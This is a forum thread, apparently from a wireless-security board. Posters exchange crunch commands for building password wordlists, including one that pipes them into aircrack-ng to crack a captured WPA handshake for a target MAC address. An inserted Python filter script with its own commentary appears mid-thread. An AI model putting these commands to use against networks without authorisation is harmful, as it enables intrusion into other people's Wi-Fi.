    So far I have noticed crunch just being a waste of time, just for the fact that I know that 70% of the word list is useless. No one in their right mind is going to use a password that it generates.

    example:
    aaaaaaaa01
    aaaaaaaa02
    aaaaaaaa03
    You never know, my friend. Just like there are people with "password" as their password, there are people with "12345" as their password.

  38. #38
    Join Date
    2014-May
    Posts
    2
    Seems that using crunch to generate a wordlist is a bit overkill. I don't know where you get your horsepower, but 10674 petabytes sounds like a bit too much data to be useful as a cracking list. Have you thought about simply mangling a traditional dictionary instead? I couldn't find a tool that would do it, so I wrote one (https://github.com/zeroskill/transmute). If you seed it with a reasonable word list (http://www-01.sil.org/linguistics/wordlists/english/) and give it reasonable options, the resulting list will be a much smaller search space, and is pretty likely to yield a useful result against typical targets. There are always going to be the "CorrectHorseBatteryStaple" users, but low-hanging fruit is generally what you're after when trying to penetrate.

  39. #39
    Join Date
    2014-Dec
    Posts
    1
    Hi, all.

    Is there a way to run this but somehow tell the program not to use double letters? I would like to reduce the time needed to try out different combinations by avoiding combinations like bbbbgasd, or any combination where the same two letters appear one after another. It would seem more logical to me, because in my language we don't have words like that, so any help on how to do this would be appreciated.

  40. #40
    Join Date
    2014-Sep
    Posts
    13
    Hi,

    Can someone help me on how to generate passwords with crunch using only min 8 and max 8 character long words (charset = the 26 lowercase English letters), but where each character appears at most TWICE?
    e.g.
    abcdeefg
    or
    aabcdefg
    or
    abcdbefg
    or
    lmnoppqr
    or
    opqrstsu

    etc..

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    To backt

    This would take a long time to complete, but it could be done. This would keep the file sizes down.
    Google "Crunch A Day With Tape", an excellent tutorial; there are two tutorials by this author.

    Crunch will let you fix positions with variables surrounding them, for example:

    The aa has eight positions

    aa@@@@@@
    @aa@@@@@
    @@aa@@@@
    @@@aa@@@
    @@@@aa@@
    @@@@@aa@
    @@@@@@aa
    a@@@@@@a

    Therefore:

    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t aa@@@@@@ -o File-aa@@@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @aa@@@@@ -o File-@aa@@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@aa@@@@ -o File-@@aa@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@aa@@@ -o File-@@@aa@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@aa@@ -o File-@@@@aa@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@@aa@ -o File-@@@@@aa@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@@@aa -o File-@@@@@@aa
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t a@@@@@@a -o File-a@@@@@@a

    Unfortunately you have another approx. 40 positions, counting duplicates, where two a's could be placed.

    Note our example has a lot of duplicates; this is just a rough overview.

    a@a@@@@@
    @a@a@@@@
    @@a@a@@@
    @@@a@a@@
    @@@@a@a@
    @@@@@a@a
    a@@@@@a@
    @a@@@@@a

    a@@a@@@@
    @a@@a@@@
    @@a@@a@@
    @@@a@@a@
    @@@@a@@a
    a@@@@a@@
    @a@@@@a@
    @@a@@@@a

    a@@@a@@@
    @a@@@a@@
    @@a@@@a@
    @@@a@@@a
    a@@@a@@@
    @a@@@a@@
    @@@a@@a@
    @@@a@@@a


    a@@@@a@@
    @a@@@@a@
    etc


    a@@@@@a@
    @a@@@@@a
    etc

    a@@@@@@a
    aa@@@@@@
    etc

    You have to do this with all 26 characters


    crunch 8 8 "acdefghijklmnopqrstuvwxyz" -t bb@@@@@@ -o File-bb@@@@@@

    etc

    crunch 8 8 "abdefghijklmnopqrstuvwxyz" -t cc@@@@@@ -o File-cc@@@@@@

    etc

    We suggest you make the file DOS compatible with

    cat File-aa@@@@@@ | unix2dos > File-aa@@@@@@dos.txt

    Then remove duplicates by joining all the aa files:

    sort -u File-*aa*dos.txt > aa-combined-dos.txt


    Publish your work when you are finished.

    MTeams

  42. #42
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To backt

    This would take a long time to complete, but it could be done. This would keep the file sizes down.
    Google "Crunch A Day With Tape", an excellent tutorial; there are two tutorials by this author.
    ....

    Publish your work when you are finished.

    MTeams
    Thank you for your genius solution.
    I also found the tutorial that you suggested, and there is the "-d" switch, and I think this is what I need! I will test it today/tomorrow.
    -d Limits the number of consecutive identical characters (crunch v3.2)
    I do not have enough room on my HDD to generate such a huge file (I guess this needs lots of GBs), so I use a pipe and send it immediately from crunch to aircrack.
    If you mean to publish the wordlist that crunch generates, then I have to buy a 1TB or 2TB external HDD, then generate the file and upload it somewhere.

    Thank you and I will give a feedback after the test.

  43. #43
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by backt View Post
    Thank you for your genius solution.
    I also found the tutorial that you suggested, and there is the "-d" switch, and I think this is what I need! I will test it today/tomorrow.
    -d Limits the number of consecutive identical characters (crunch v3.2)
    I do not have enough room on my HDD to generate such a huge file (I guess this needs lots of GBs), so I use a pipe and send it immediately from crunch to aircrack.
    If you mean to publish the wordlist that crunch generates, then I have to buy a 1TB or 2TB external HDD, then generate the file and upload it somewhere.

    Thank you and I will give a feedback after the test.
    Using the -d switch is not the solution for me: although it will not repeat each character more than twice (in my case "-d 2") after each other, it will still repeat them more than twice within the whole 8 character long word, which is not good for me.

    This will not give the aaabcdef variation, but it will give aabacdef, and that is what I do not want.

    It would be great if crunch could handle repetitions.

    So I could tell crunch not to repeat each character more than "X" times; in my case, do not repeat each character more than 2 times.

  44. #44
    Join Date
    2013-Jul
    Posts
    844
    The author of adstar, repzeroworld, has written a program similar to crunch. We have not studied this program. You can find the download in these forums and/or write to repzeroworld directly. The author may have a better ability to manipulate strings than what MTeams has suggested.

  45. #45
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    The author of adstar, repzeroworld, has written a program similar to crunch. We have not studied this program. You can find the download in these forums and/or write to repzeroworld directly. The author may have a better ability to manipulate strings than what MTeams has suggested.
    Thanks! This is what I need. Adstar.

    "-r REPEAT_A_CHARACTER
    no. of times to repeat a character,e.g, '-r 2' will
    generate all combination of words INCLUDING words with
    each character being repeated a maximum of 2 times."

    I am gonna test it soon.

  46. Someone help me, is there any tool with which I can filter words according to their length? Like, from a wordlist/dictionary file I want to separate those words whose length is 8. So how do I do this? How do I separate only 8 character words from a dictionary?

  47. #47
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by FurqanHanif View Post
    Someone help me, is there any tool with which I can filter words according to their length? Like, from a wordlist/dictionary file I want to separate those words whose length is 8. So how do I do this? How do I separate only 8 character words from a dictionary?
    What if you put them in a Calc / Excel file and paste every character in a separate cell, then delete all columns after column "H"?
    Then you can filter those rows which have something in cells "A" to "H".

    You can also use formulas to remove character after 8th character.
    http://www.extendoffice.com/document...character.html


    or see this post

    http://hashcat.net/forum/thread-2350.html
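To make the distinction backt draws in #43 concrete (crunch's -d bounds consecutive repeats, not total repeats), and to answer #46's length question in the same pass, here is a small streaming filter. It is an added example, not code from this thread, from crunch or from adstar; the script name repfilter.py and the command-line arguments are made up. consecutive_ok is the rule crunch -d applies, per_char_ok is the per-word limit asked for, filter_stream combines it with an exact-length check, and keyspace counts how many words survive the limit.

```python
import sys
from collections import Counter
from math import comb


def consecutive_ok(word, limit):
    """Rule that crunch -d <limit> enforces: no run of more than `limit` identical adjacent characters."""
    run, prev = 0, None
    for ch in word:
        run = run + 1 if ch == prev else 1
        if run > limit:
            return False
        prev = ch
    return True


def per_char_ok(word, limit):
    """Rule asked for in #43: no character occurs more than `limit` times anywhere in the word."""
    return all(n <= limit for n in Counter(word).values())


def keyspace(length, alphabet_size, limit):
    """Number of words of `length` over `alphabet_size` symbols with each symbol used at most `limit` times.

    DP over symbols: dp[j] is the number of words of length j built from the symbols processed so far.
    Adding c copies of a new symbol to a length-j word has comb(j + c, c) distinct interleavings.
    """
    dp = [1] + [0] * length
    for _ in range(alphabet_size):
        new = [0] * (length + 1)
        for j, ways in enumerate(dp):
            if ways:
                for c in range(min(limit, length - j) + 1):
                    new[j + c] += ways * comb(j + c, c)
        dp = new
    return dp[length]


def filter_stream(lines, length, limit):
    """Yield candidates of exactly `length` characters that pass per_char_ok (this also covers #46)."""
    for line in lines:
        word = line.rstrip("\r\n")
        if len(word) == length and per_char_ok(word, limit):
            yield word


if __name__ == "__main__":
    # Hypothetical usage:  crunch 8 8 abcdefghijklmnopqrstuvwxyz | python3 repfilter.py 8 2 | aircrack-ng ... -w-
    length, limit = int(sys.argv[1]), int(sys.argv[2])
    sys.stdout.writelines(word + "\n" for word in filter_stream(sys.stdin, length, limit))
```

keyspace(8, 26, 2) returns 193983426000 against 26**8 = 208827064576, so capping every letter at two occurrences removes only about 7% of the lowercase 8-character candidates. Length and alphabet size dominate the search cost, which is the figure to keep in mind when judging how much such structural assumptions actually shrink a search.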

  48. #48
    Join Date
    2015-Aug
    Posts
    5
    I am using crunch to try and crack a .cap file. I cannot install pyrit (even though I have an Intel CPU, I cannot for the life of me figure out how to integrate OpenCL and pyrit), so I was wondering what I could do to this to integrate the commonly used Spanish (Mexico) characters?

    crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -a 2 -b (target mac address) -w- (output file name).cap

  49. #49
    Join Date
    2015-Aug
    Posts
    11
    Dear All..
    I already started cracking a password using the page 1 method, and was successful.
    But my question is this:
    How can we crack a password with special characters?
    Hoping for your best reply.
    Thanking you.

  50. #50
    Join Date
    2015-Nov
    Posts
    1
    Hi !
    I need your help please! I would like to know what symbol is between the 9 and aircrack-ng. Do you have to specify the cap file, like /root/Desktop/handshakefile.cap? Thanks a lot! Hope to hear from you soon!
